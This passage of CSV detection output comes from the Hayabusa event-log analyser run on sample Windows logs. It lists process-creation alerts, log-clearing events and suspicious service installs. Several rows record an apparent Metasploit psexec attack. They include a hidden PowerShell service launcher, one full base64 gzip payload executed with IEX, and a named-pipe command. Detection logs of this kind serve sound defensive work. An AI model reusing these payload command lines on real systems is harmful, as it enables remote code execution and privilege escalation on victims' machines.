0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service 
Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:10:32.160 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:46:27.941 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:58.162 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:58.162 
